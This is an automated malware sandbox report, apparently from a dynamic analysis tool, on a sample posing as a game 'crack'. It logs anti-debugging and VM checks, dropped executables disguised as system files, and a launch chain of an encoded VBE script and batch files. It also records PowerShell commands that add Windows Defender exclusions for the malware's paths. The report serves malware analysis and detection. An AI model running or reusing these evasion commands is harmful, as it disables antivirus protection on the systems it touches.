Source: C:\Program Files\Windows NT\smss.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\smss.exe	Memory allocated: 1B0D0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\smss.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\smss.exe	Memory allocated: 1890000 memory reserve \| memory write watch

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\smss.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2692	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2602	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2827
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2154
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2494
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2647

Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BwtLSSWj.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wSzMZIas.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\USBzXUek.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DYilKdVO.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Rfxshdov.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gDHycgoN.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OfbStevG.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rEjFTmFn.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JRLLnIaC.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\medFrqzz.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VlKreyqd.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qmbOMItv.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EErUokRe.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ssnNFABl.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sXGeTWEn.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZFTyARuY.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BOAdhoQl.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oCwXyDAs.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uQMeEZWw.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lhCxVqkE.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kHvGrYKy.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BAOTDPUV.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\npqXqOLK.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZTFIdpqp.log	Jump to dropped file
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JDNtgNEK.log	Jump to dropped file
Source: C:\Program Files\Windows NT\smss.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rfhNxLLD.log	Jump to dropped file
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\blWilNVX.log	Jump to dropped file

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23831

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1760	Thread sleep count: 2692 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep count: 2602 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2524	Thread sleep count: 2827 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752	Thread sleep count: 2154 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3128	Thread sleep count: 2494 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316	Thread sleep count: 2647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 3868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe TID: 5480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 2520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 1820	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe TID: 3540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows NT\smss.exe TID: 5360	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows NT\smss.exe TID: 1008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows NT\smss.exe TID: 2220	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Program Files\Windows NT\smss.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\Windows NT\smss.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Program Files\Windows NT\smss.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Program Files\Windows NT\smss.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows NT\smss.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows NT\smss.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001CA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_001CA69B
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_001DC220
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001EB348 FindFirstFileExA,	0_2_001EB348

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001DE6A3 VirtualQuery,GetSystemInfo,

0_2_001DE6A3

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\smss.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows NT\smss.exe	Thread delayed: delay time: 922337203685477

Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	File opened: C:\Users\user

Source: wscript.exe, 00000002.00000003.1426480255.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: smss.exe, 00000032.00000002.2177876464.000000001BE44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`#D
Source: smss.exe, 00000032.00000002.2239000814.000000001BF11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BlockcontainerWin.exe, 00000005.00000002.1578353516.000000001C56B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: w32tm.exe, 00000036.00000002.1695163459.0000023FFDCC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
Source: NursultanAlphaCrack.bat.exe, smss.exe.5.dr, BlockcontainerWin.exe.0.dr	Binary or memory string: adnFBHgFsDXar5GTELb9

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

API call chain: ExitProcess graph end node

graph_0-24023

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001DF838

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001E7DEE mov eax, dword ptr fs:[00000030h]

0_2_001E7DEE

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001EC030 GetProcessHeap,

0_2_001EC030

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process token adjusted: Debug
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process token adjusted: Debug
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Process token adjusted: Debug
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows NT\smss.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows NT\smss.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001DF838
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DF9D5 SetUnhandledExceptionFilter,	0_2_001DF9D5
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001DFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001DFBCA
Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Code function: 0_2_001E8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001E8EBD

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'	Jump to behavior

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portsurrogateFontCrt\unyQgcnbrXR6kUk3LNilotfJnp9OLZPJv809nYh2EMxHRw3.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portsurrogateFontCrt\mhHwHj5jfnxhi.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portsurrogateFontCrt\BlockcontainerWin.exe "C:\portsurrogateFontCrt/BlockcontainerWin.exe"	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\smss.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portsurrogateFontCrt\BlockcontainerWin.exe'	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DFtfeA2Uey.bat"	Jump to behavior
Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Program Files\Windows NT\smss.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows NT\smss.exe "C:\Program Files\Windows NT\smss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: 0_2_001DF654 cpuid

0_2_001DF654

Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_001DAF0F

Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Queries volume information: C:\portsurrogateFontCrt\BlockcontainerWin.exe VolumeInformation	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\portsurrogateFontCrt\BlockcontainerWin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
